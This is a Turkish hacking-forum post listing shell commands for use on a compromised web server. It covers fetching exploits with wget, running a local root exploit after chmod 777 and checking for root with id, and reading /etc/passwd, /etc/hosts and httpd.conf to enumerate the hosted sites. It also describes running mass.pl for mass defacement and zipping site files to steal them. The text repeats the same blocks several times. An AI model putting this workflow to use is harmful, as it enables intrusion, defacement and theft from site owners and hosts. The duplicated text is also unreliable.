The Punisher
MFC Üyesi
- Üyelik Tarihi
- 6 Haz 2015
- Konular
- 785
- Mesajlar
- 930
- MFC Puanı
- 230
Chmod = Dosyaya yazım izinleri vermeye yarayan komutumuzdur. Genelde Exploite yazma izni vererek kullanılabilir hale gelmesini sağlar. Örneğin : Chmod 777 dosya ısmı
wget = Bulunulan dizine dosya çekmeye yarar. Genelde index.html ve exploit cekmek için kullanırız. Örneğin
cd = Bu komut ile klasorler arası geçişi sağlarız. Örneğin : cd /tmp komutu tmp klasorune gitmeye yarar. Genellikle yazma izni olan klasorlere geçiş yapmak için kullanılır.
pwd = Bu komut ile şuan da bulunduğumuz kalsoru öğrenebilirz.
ls -l = Bu komut bulunduğumuz klasordeki dosyaları listeler.
rm -rf = Bu komut ile dizinde bulunan dosyayı silebiliriz. Örneğin : rm -f index.html
perl = perl komutu dizinde bulunan exploiti calıstırmaya yarar. Örneğin : perl mass.pl komutu ile mass.pl adlı exploiti aktif hale gecirerek mass attack yapmış oluruz.
./ = Bu komut ise yazma izni verdiğimiz local exploitimizi calıstırmaya yarar. Chmod 777 localexploitadı ndan sonra kullanacagımız komut. Örneğin : ./RooT
id = Bu komut ise serverda ki yetkimiz hakkında bilgi verir. id yazdığımızda Uid(root) ile başlayan bir satır görüyorsak sunucunun rootu yani sahibi olmuşuz demektir.
uname -a = Bu komut sunucunun bilgilerini verir, Kernel versionunu bu komut ile öğrenerek gerekli localexploiti cekebiliriz
Serverın list dızınını almak:
cd etc
cd apache, apache2, httpd bu 3 klasorden bırı wardır deneyerek bulucaksınız
ls -la yaptıgınızda genelde eskı serverlarda httpd.conf wardır ki bunu
cat httpd.conf | grip ServerName yazıp sıte lıstı alınırdı
Mass.pl yı calıstırmak
perl mass.pl /indexinuploadoldugudizin/indexadı.htm
ornek:
perl mass.pl /home/SnL_ayaz_/public_html/index.htm
ben genelde ındexi tmp ye atarım ordan cekmesı daha kolay oluyo sız bılırsınız yınede selametle
zip -r zipady klasörady -> Dosya Zipleme
Bu komut sayesinde site yedeğinizi hızlı bir şekilde alabilirsiniz yada kötü amaçla kullanmak isterseniz ftpsini ele geçirdiğiniz bir sitenin tüm dosyalaryny çalabilirsiniz.
unzip zipady -> Zipli Dosyayy Açma
Bu komut ile site yede?inizi yada zip şeklinde upload ettiğiniz portal,forum,resim vs saniyeler içinde hızlyca serverın içinde açabilirsiniz.
cat etc/passwd -> Passwd Okuma
Hostun passwd dosyasyny okuyarak serverdaki sitelerin klasör isimlerini ö?renmenize yarar.Böylelikle klasör değiştirerek (fopen() komutunun yasaklanmamış ve permissonların 777 olmasy gerekiyor.)
cat etc/passord -> Passwd Okuma
Üstteki passwd dosyasının ismini bazy hostlar password olarak değiştirdiği için koydum.
cat etc/hosts -> Hosts Okuma
Host üzerindeki tüm site isimlerinin tutulduğu dosya.
cat etc/host -> Hosts Okuma
Üstteki hosts dosyasynyn ismini bazy hostlar host olarak değiştirdiği için koydum.
wget -m site.com -> Tüm siteyi çekmek
Bu komut sayesinde tüm siteyi kolaylykla kendi serverynyza çekebilirsiniz.(NOThp ve asp dosyalary çekmeye çalıimayın çünkü htmlye yansıyan görüntüsünü alırsnız.)Zip rar mp3 vs çekmede 1 e 1
wget dosya.uzanty -> Dosya Çekmek
Yukardaki komutun sadece dosya çekmesini sa?layan hali.
ls- la -> Dosya Listeleme
Basit klasör listelemenizi sağlar.
gcc exploit.c -o dosya -> Exploit Derleme
Exploit derleme komutu
zip -r zipady klasörady -> Dosya Zipleme
Bu komut sayesinde site yedeğinizi hızlı bir şekilde alabilirsiniz yada kötü amaçla kullanmak isterseniz ftpsini ele geçirdiğiniz bir sitenin tüm dosyalaryny çalabilirsiniz.
unzip zipady -> Zipli Dosyayy Açma
Bu komut ile site yede?inizi yada zip şeklinde upload ettiğiniz portal,forum,resim vs saniyeler içinde hızlyca serverın içinde açabilirsiniz.
cat etc/passwd -> Passwd Okuma
Hostun passwd dosyasyny okuyarak serverdaki sitelerin klasör isimlerini ö?renmenize yarar.Böylelikle klasör değiştirerek (fopen() komutunun yasaklanmamış ve permissonların 777 olmasy gerekiyor.)
cat etc/passord -> Passwd Okuma
Üstteki passwd dosyasının ismini bazy hostlar password olarak değiştirdiği için koydum.
cat etc/hosts -> Hosts Okuma
Host üzerindeki tüm site isimlerinin tutulduğu dosya.
cat etc/host -> Hosts Okuma
Üstteki hosts dosyasynyn ismini bazy hostlar host olarak değiştirdiği için koydum.
wget -m site.com -> Tüm siteyi çekmek
Bu komut sayesinde tüm siteyi kolaylykla kendi serverynyza çekebilirsiniz.(NOThp ve asp dosyalary çekmeye çalıimayın çünkü htmlye yansıyan görüntüsünü alırsnız.)Zip rar mp3 vs çekmede 1 e 1
wget dosya.uzanty -> Dosya Çekmek
Yukardaki komutun sadece dosya çekmesini sa?layan hali.
ls- la -> Dosya Listeleme
Basit klasör listelemenizi sağlar.
gcc exploit.c -o dosya -> Exploit Derleme
wget = Bulunulan dizine dosya çekmeye yarar. Genelde index.html ve exploit cekmek için kullanırız. Örneğin
cd = Bu komut ile klasorler arası geçişi sağlarız. Örneğin : cd /tmp komutu tmp klasorune gitmeye yarar. Genellikle yazma izni olan klasorlere geçiş yapmak için kullanılır.
pwd = Bu komut ile şuan da bulunduğumuz kalsoru öğrenebilirz.
ls -l = Bu komut bulunduğumuz klasordeki dosyaları listeler.
rm -rf = Bu komut ile dizinde bulunan dosyayı silebiliriz. Örneğin : rm -f index.html
perl = perl komutu dizinde bulunan exploiti calıstırmaya yarar. Örneğin : perl mass.pl komutu ile mass.pl adlı exploiti aktif hale gecirerek mass attack yapmış oluruz.
./ = Bu komut ise yazma izni verdiğimiz local exploitimizi calıstırmaya yarar. Chmod 777 localexploitadı ndan sonra kullanacagımız komut. Örneğin : ./RooT
id = Bu komut ise serverda ki yetkimiz hakkında bilgi verir. id yazdığımızda Uid(root) ile başlayan bir satır görüyorsak sunucunun rootu yani sahibi olmuşuz demektir.
uname -a = Bu komut sunucunun bilgilerini verir, Kernel versionunu bu komut ile öğrenerek gerekli localexploiti cekebiliriz
Serverın list dızınını almak:
cd etc
cd apache, apache2, httpd bu 3 klasorden bırı wardır deneyerek bulucaksınız
ls -la yaptıgınızda genelde eskı serverlarda httpd.conf wardır ki bunu
cat httpd.conf | grip ServerName yazıp sıte lıstı alınırdı
Mass.pl yı calıstırmak
perl mass.pl /indexinuploadoldugudizin/indexadı.htm
ornek:
perl mass.pl /home/SnL_ayaz_/public_html/index.htm
ben genelde ındexi tmp ye atarım ordan cekmesı daha kolay oluyo sız bılırsınız yınede selametle
zip -r zipady klasörady -> Dosya Zipleme
Bu komut sayesinde site yedeğinizi hızlı bir şekilde alabilirsiniz yada kötü amaçla kullanmak isterseniz ftpsini ele geçirdiğiniz bir sitenin tüm dosyalaryny çalabilirsiniz.
unzip zipady -> Zipli Dosyayy Açma
Bu komut ile site yede?inizi yada zip şeklinde upload ettiğiniz portal,forum,resim vs saniyeler içinde hızlyca serverın içinde açabilirsiniz.
cat etc/passwd -> Passwd Okuma
Hostun passwd dosyasyny okuyarak serverdaki sitelerin klasör isimlerini ö?renmenize yarar.Böylelikle klasör değiştirerek (fopen() komutunun yasaklanmamış ve permissonların 777 olmasy gerekiyor.)
cat etc/passord -> Passwd Okuma
Üstteki passwd dosyasının ismini bazy hostlar password olarak değiştirdiği için koydum.
cat etc/hosts -> Hosts Okuma
Host üzerindeki tüm site isimlerinin tutulduğu dosya.
cat etc/host -> Hosts Okuma
Üstteki hosts dosyasynyn ismini bazy hostlar host olarak değiştirdiği için koydum.
wget -m site.com -> Tüm siteyi çekmek
Bu komut sayesinde tüm siteyi kolaylykla kendi serverynyza çekebilirsiniz.(NOThp ve asp dosyalary çekmeye çalıimayın çünkü htmlye yansıyan görüntüsünü alırsnız.)Zip rar mp3 vs çekmede 1 e 1
wget dosya.uzanty -> Dosya Çekmek
Yukardaki komutun sadece dosya çekmesini sa?layan hali.
ls- la -> Dosya Listeleme
Basit klasör listelemenizi sağlar.
gcc exploit.c -o dosya -> Exploit Derleme
Exploit derleme komutu
zip -r zipady klasörady -> Dosya Zipleme
Bu komut sayesinde site yedeğinizi hızlı bir şekilde alabilirsiniz yada kötü amaçla kullanmak isterseniz ftpsini ele geçirdiğiniz bir sitenin tüm dosyalaryny çalabilirsiniz.
unzip zipady -> Zipli Dosyayy Açma
Bu komut ile site yede?inizi yada zip şeklinde upload ettiğiniz portal,forum,resim vs saniyeler içinde hızlyca serverın içinde açabilirsiniz.
cat etc/passwd -> Passwd Okuma
Hostun passwd dosyasyny okuyarak serverdaki sitelerin klasör isimlerini ö?renmenize yarar.Böylelikle klasör değiştirerek (fopen() komutunun yasaklanmamış ve permissonların 777 olmasy gerekiyor.)
cat etc/passord -> Passwd Okuma
Üstteki passwd dosyasının ismini bazy hostlar password olarak değiştirdiği için koydum.
cat etc/hosts -> Hosts Okuma
Host üzerindeki tüm site isimlerinin tutulduğu dosya.
cat etc/host -> Hosts Okuma
Üstteki hosts dosyasynyn ismini bazy hostlar host olarak değiştirdiği için koydum.
wget -m site.com -> Tüm siteyi çekmek
Bu komut sayesinde tüm siteyi kolaylykla kendi serverynyza çekebilirsiniz.(NOThp ve asp dosyalary çekmeye çalıimayın çünkü htmlye yansıyan görüntüsünü alırsnız.)Zip rar mp3 vs çekmede 1 e 1
wget dosya.uzanty -> Dosya Çekmek
Yukardaki komutun sadece dosya çekmesini sa?layan hali.
ls- la -> Dosya Listeleme
Basit klasör listelemenizi sağlar.
gcc exploit.c -o dosya -> Exploit Derleme